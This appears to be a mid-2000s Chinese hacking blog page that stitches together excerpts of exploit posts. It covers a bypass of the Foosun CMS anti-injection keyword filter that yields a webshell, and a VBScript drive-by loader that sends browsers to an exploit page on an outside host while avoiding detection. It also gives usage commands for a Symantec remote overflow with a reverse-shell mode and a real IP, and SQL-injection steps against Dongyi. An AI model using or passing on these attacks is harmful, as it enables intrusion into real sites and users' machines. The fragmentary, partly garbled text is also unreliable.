On February 9, zero-day exploit code [1] was posted on milw0rm site. It exploited
vulnerability in linux kernels Versions 2.6.17 to 2.6.24.1. This bug allows
an unprivileged local user to gain root privileges. This vulnerability was
assigned CVE-2008-0600.
There are reports that this exploit is reliable and actively used in the wild.
The inner workings of this exploit are quite interesting from the
technical point of view; let’s have a look.

» 阅读全文

foosun cms4sp5 商业版存在严重注射漏洞

风讯4的防注射函数NoSqlHack存在致命缺陷，导致入侵者可以轻松得到webshell

Function.asp
Function NoSqlHack(FS_inputStr)
    Dim f_NoSqlHack_AllStr,f_NoSqlHack_Str,f_NoSqlHack_i,Str_InputStr
    Str_InputStr=FS_inputStr
    f_NoSqlHack_AllStr="*|and |exec |or |insert |select |delete |update |count |master |truncate |declare |and    |exec    |insert    |select    |delete    |update    |count    |master    |truncate    |declare    |char(|mid(|chr(|and[|exec[|insert[|select[|delete[|update[|count[|master[|truncate[|declare[|set[|set |set    |where[|where |where    |xp_cmdshell|xp_cmdshell |xp_cmdshell    "
    f_NoSqlHack_Str = Split(f_NoSqlHack_AllStr,"|")


    For f_NoSqlHack_i=LBound(f_NoSqlHack_Str) To Ubound(f_NoSqlHack_Str)
    If Instr(LCase(Str_InputStr),f_NoSqlHack_Str(f_NoSqlHack_i))<>0 Then
    If f_NoSqlHack_Str(f_NoSqlHack_i)="'" Then f_NoSqlHack_Str(f_NoSqlHack_i)=" \' "
    Response.Write "<html><title>??</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>???????????</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>?????????!</li><br><li>??IP:"&Request.ServerVariables("Remote_Addr")&"</li><br><li>????:"&Now&"</li></font></body></html><!--Powered by Foosun Inc.,AddTime:"&now&"-->"
    Response.End
    End if
    Next
    NoSqlHack = Replace(Str_InputStr,"'","''")
End Function
关键字后面跟空格和tab是过滤的,但是跟回车时一样可以执行注射语句.过滤单引号也没有用的，我插入时用16进制编码,所以每一个点都是有问题的注射点

http://www.sebug.net/vulndb/2306

saforum 注射漏洞

saforum是国内安全研究人员修改过的saforum论坛,但是代码中有一点瑕疵导致可能被获取管理员权限:)
\include\common.php 行41~49引入没有过滤的变量

http://www.sebug.net/vulndb/2237

sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取管理员权限:)

问题出在wap/index.php里的652行左右

» 阅读全文

经过一天的折腾，终于是到家了。

累得不行，呵。不过在内蒙也不错，项目都已经搞定了，已经验收了。用户对我们的工作也还算是满意吧。不过也得好好的总结一下，毕竟还是存在着一些问题。下个星期又开始新的生活了。

前几天BOSS传给我一个IIS的溢出。哈哈，当时兴奋了半天，传说中的iis6远程溢出啊，哈哈。丢几个图看看。

出来好些时间了，看到有朋友发出来，我也发个玩玩
也就是PM.php的东东

» 阅读全文

<script language=VBScript>
on error resume next
set     server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
else
'msgbox "存在0614漏洞,页面转到MS0614的exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
这样就优先执行0614,没有没有0614漏洞再执行ms07004，还可以再接着写，如果没有ms07004，就返回空页面算了，减少被发现的机率

来源：7jgd's blog

收集的2006年的所有EXP源码

感谢好友 小轩 提供

也谢谢所有朋友对本站的支持

http://www.sebug.net/show-exp-920.html

Symantec remote management stack buffer overflow exploits for Win32/x86

扫描2967 2976这两个端口

成功率在30%`40%

正向
s -r ip -p 2976

反向
s -r ip -l 你的ip -d 你的端口

PS:
s -r 61.100.149.160

» 阅读全文

信息来源:h4x0r's blog

前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL 后面就是SQL语句啦

返回信息：
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp，行 32

针对mssql的
NBSI 直接列目录 >备份> ok!